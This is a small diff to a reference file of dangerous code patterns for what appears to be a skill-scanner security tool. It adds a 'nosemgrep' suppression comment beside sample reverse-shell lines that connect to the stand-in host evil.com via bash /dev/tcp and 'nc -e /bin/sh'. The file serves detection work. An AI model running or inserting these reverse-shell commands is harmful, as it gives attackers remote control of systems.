diff --git a/skills/skill-scanner/references/dangerous-code-patterns.md b/skills/skill-scanner/references/dangerous-code-patterns.md index ccf036d..9740732 100644 --- a/skills/skill-scanner/references/dangerous-code-patterns.md +++ b/skills/skill-scanner/references/dangerous-code-patterns.md @@ -44,6 +44,7 @@ subprocess.Popen(["/bin/sh"], stdin=s.fileno(), stdout=s.fileno(), stderr=s.file ### Subprocess-Based ```python subprocess.Popen("bash -i >& /dev/tcp/evil.com/4444 0>&1", shell=True) +# nosemgrep: skill-reverse-shell os.system("nc -e /bin/sh evil.com 4444") ```